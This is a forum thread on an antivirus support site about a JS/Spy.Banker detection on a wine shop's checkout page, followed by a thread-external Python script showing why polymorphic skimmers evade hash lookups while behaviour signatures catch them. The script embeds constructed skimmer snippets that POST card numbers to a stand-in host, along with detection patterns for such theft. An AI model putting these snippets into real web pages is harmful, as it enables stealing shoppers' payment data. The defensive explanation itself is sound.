
JS/Spy.Banker.IV false positive or true?



Hello, a customer informs me that his ESET antivirus detects the JS/Spy.Banker virus on this page: https://www.domainedestrottieres.com/commande . Could you help me, because only ESET finds this virus? Thanks.


ESET is also detecting the malicious script on the web site page where the actual product ordering is performed, i.e. where payment method details are entered.


  • Administrators
4 hours ago, rotaru said:

This:

domainedestrottieres.com

generates ZERO detections on VT

Not detections but URL blacklists. Since it's a legitimate site that was infected with malware, we are not going to blacklist it completely. Blacklisting whole sites makes sense especially when they are created for malicious purposes.


Hello,

Thank you for your feedback, but I still don't understand. I have the same results as rotaru on VT. Is there something or not? Why does Marcos get a positive?

Thanks again.


  • Administrators
1 minute ago, franck said:

Thank you for your feedback, but I still don't understand. I have the same results as rotaru on VT. Is there something or not? Why does Marcos get a positive?

That's because you checked whether the website URL is blacklisted by AVs, while I scanned the file that contained the malicious JS. So it's like comparing apples with oranges: blacklisted URLs and HTML files with malware are two different things.


  • Administrators
4 minutes ago, franck said:

one more question, what is the infected js file?

The url where the malware was detected can be found in the Detections logs. In this case it was

https://www.domainedestrottieres.com/commande

 


1 hour ago, Marcos said:

while I scanned the file

So, I want to reproduce the detection.

 

What exactly did you download? This is a site where you can place orders for wines; I couldn't "download" anything.


9 hours ago, rotaru said:

Checked the website with Quttera, which downloaded 99 files, analyzed for 5 minutes, and this is the result:

Go here: https://www.domainedestrottieres.com/blancs-cremants/9-anjou-chenin-clair-de-lune-75-cl.html

Mouse click on the shopping cart tab located in Visa/Mastercard area of the web page.

On the next web page displayed, mouse click on the "Commander" button:

[Screenshot: ESET detection]

Appears the malware is one of the card credential data stealing variants.

 


In regards to this specific web site, it is using outdated PHP software, as noted in this Sucuri analysis: https://sitecheck.sucuri.net/results/https/www.domainedestrottieres.com/commande . This means that even if the JavaScript malware is removed, they will probably be exploited again with it.


33 minutes ago, itman said:

In regards to this specific web site, it is using outdated PHP software, as noted in this Sucuri analysis: https://sitecheck.sucuri.net/results/https/www.domainedestrottieres.com/commande . This means that even if the JavaScript malware is removed, they will probably be exploited again with it.

Maybe "outdated", but it is not determined to be malicious or blacklisted:

 

[Screenshot]


One other thing about the JavaScript malware: it's polymorphic. I have 5 ESET log entries for it and each has a different hash value. An additional reason why the online web site scanners can't detect it.


31 minutes ago, rotaru said:

Maybe "outdated", but it is not determined to be malicious or blacklisted:

Refer to this prior posting: https://forum.eset.com/topic/35944-sspybankeriv-false-positive-or-true/?do=findComment&comment=164956 . Note the VT embedded-js reference. Next, open the Sucuri analysis again and refer to the JavaScripts that exist.

Bottom line is the script is hidden and the online web scanners didn't know it existed.

 


14 minutes ago, itman said:

I have 5 ESET log entries for it and each has a different hash value. An additional reason why the online web site scanners can't detect it.

Hello Itman,

Thank you for your patience!

ESET is famous for "exotic" detections. As a regular user, I did everything possible to replicate a detection:

  • checked the website on VT
  • checked the website with Quttera
  • replicated the steps indicated in your post with 3 different AVs

Yet I did not get any detection; the fact that you have "5 ESET log entries for it and each has a different hash value" is not encouraging. On the contrary, it demonstrates inconsistency rather than detection.

I am confused!

 


1 hour ago, rotaru said:

Yet I did not get any detection; the fact that you have "5 ESET log entries for it and each has a different hash value" is not encouraging. On the contrary, it demonstrates inconsistency rather than detection.

First, I advise you to read up on ESET's protection mechanisms here: https://www.eset.com/fileadmin/ESET/US/docs/about/ESET-Technology-Whitepaper.pdf . The one I will reference here is DNA detections.

A favorite trick among malware creators is to slightly modify their scripts, and binaries also, to try to avoid AVs' static signature detection. ESET's DNA detection employs "smart" signatures that record malware code and behavior "snippets", which are portions of a malicious script or binary. This allows ESET to detect modified malware variants, also known as polymorphic malware. Also in this regard, ESET has one of the best "smart" signatures among all security products.

As far as this web site goes, it appears the web server is compromised. This allows the attacker to "serve up" a modified script each time the "Order" button is selected.


1 hour ago, itman said:

Eset has one of the best "smart" signatures

That could be; however, for a regular user who would show due diligence and check the "detection" on multiple sites only to get ZERO results, this is confusing.

 

On top of that , ESET detection says "This website may contain dangerous..."

So it is "may", which can be "may not". So when you check it in 6-7 places and the result is ZERO, sure, "may not" seems the real choice.

But enough talking, sure ESET is doing a fine job.

But not for me.


13 hours ago, rotaru said:

That could be; however, for a regular user who would show due diligence and check the "detection" on multiple sites only to get ZERO results, this is confusing.

The online web site scanners also reference VT results and factor those into their final determination. None of the hashes for the 5 variants of this script in my ESET Detection log are known to VT. One other very important point: these scanners only scan via an HTTP connection, not via HTTPS. The web site connection where the malware exists can only be accessed via HTTPS.

As far as other AV solutions being able to detect this malware, some can. Refer to @Marcos's prior posting here: https://forum.eset.com/topic/35944-sspybankeriv-false-positive-or-true/?do=findComment&comment=164956

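The two points itman makes above, that a server-side rewrite changes the script's hash on every load so a VT hash lookup finds nothing, and that a "snippet" style signature still fires on the stable behaviour, and Marcos's earlier distinction between a URL blacklist check and scanning the fetched file, can be shown with a short analysis script. This is an added example and is not code from the thread, from ESET or from any scanner: the two page captures, the benign script and the signature patterns are constructed for illustration, the exfiltration host is a reserved example name, and the "snippet signature" is a simplified stand-in for the idea, not ESET's DNA signature format.

```python
import hashlib
import re

# Two constructed captures of the same checkout page fetched twice over HTTPS.
# A compromised server that rewrites its injected script per request is
# simulated by renaming one variable and swapping a junk comment between loads.
# These strings were written for this example; they are not the script from the
# site discussed in the thread.
LOAD_1 = """<html><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script>var a1=document.querySelector('[name=cc_number]');/*k3f9*/
fetch('https://exfil.example.invalid/c',{method:'POST',body:a1.value});</script>
</body></html>"""

LOAD_2 = """<html><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script>var q7=document.querySelector('[name=cc_number]');/*z01x*/
fetch('https://exfil.example.invalid/c',{method:'POST',body:q7.value});</script>
</body></html>"""

# A benign inline script of the kind a shop page legitimately carries (constructed).
BENIGN = """<html><body><a id="cart">Commander</a>
<script>var cart=document.getElementById('cart');/*ok*/
cart.addEventListener('click',function(){location.href='/commande';});</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.DOTALL | re.IGNORECASE)

# Behaviour fragments a card skimmer keeps however it is re-obfuscated: read a
# payment field, then POST it to an absolute (off-site) URL. A simplified
# stand-in for the "snippet" idea, not ESET's actual signature format.
SNIPPET_SIGNATURE = [
    r"querySelector\(\s*['\"]\[name=(?:cc_number|cvv)\]['\"]\s*\)",
    r"fetch\(\s*['\"]https?://",
    r"method\s*:\s*['\"]POST['\"]",
]


def sha256_hex(text):
    """Hex SHA-256 of a string: the key a VT hash lookup is made on."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def extract_inline_scripts(html):
    """Return the bodies of all inline <script> elements in a page."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)]


def normalize(script):
    """Drop comments and collapse whitespace so junk padding no longer changes
    the text. Identifier renames survive this, so even a hash of the
    normalized script is not a stable key; only the behaviour fragments are."""
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.DOTALL)
    # Line comments only where '//' follows start-of-line, whitespace or a
    # delimiter, so the '//' inside a URL literal is left alone.
    script = re.sub(r"(?m)(?:^|(?<=[;\s{}]))//[^\n]*", "", script)
    return re.sub(r"\s+", " ", script).strip()


def matches_snippet_signature(script):
    """True when every behaviour fragment is present in the normalized script."""
    text = normalize(script)
    return all(re.search(pattern, text) for pattern in SNIPPET_SIGNATURE)


def analyse_loads(loads):
    """Hash each captured page and its first inline script three ways and run
    the snippet signature over the script. Returns one list per measure, in
    load order, so the caller can see which measures vary between loads."""
    result = {"page_hashes": [], "script_hashes": [],
              "normalized_hashes": [], "signature_hits": []}
    for html in loads:
        scripts = extract_inline_scripts(html)
        script = scripts[0] if scripts else ""
        result["page_hashes"].append(sha256_hex(html))
        result["script_hashes"].append(sha256_hex(script))
        result["normalized_hashes"].append(sha256_hex(normalize(script)))
        result["signature_hits"].append(matches_snippet_signature(script))
    return result


if __name__ == "__main__":
    report = analyse_loads([LOAD_1, LOAD_2])
    for key, values in report.items():
        print(key, [str(v)[:12] for v in values])
    print("benign signature hits:", analyse_loads([BENIGN])["signature_hits"])
```

Running it prints two different values in each of the three hash rows (whole page, raw script, comment-stripped script) but `[True, True]` for the signature row, and `[False]` for the benign page. That is the situation the thread describes: a lookup keyed on the URL or on any hash of the served content finds nothing, while a match on the behaviour fragments holds across the variants.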

  • Administrators

I strongly discourage you from opening websites on physical machines that another person reports as possibly infected. And yes, the detection occurs under specific conditions.

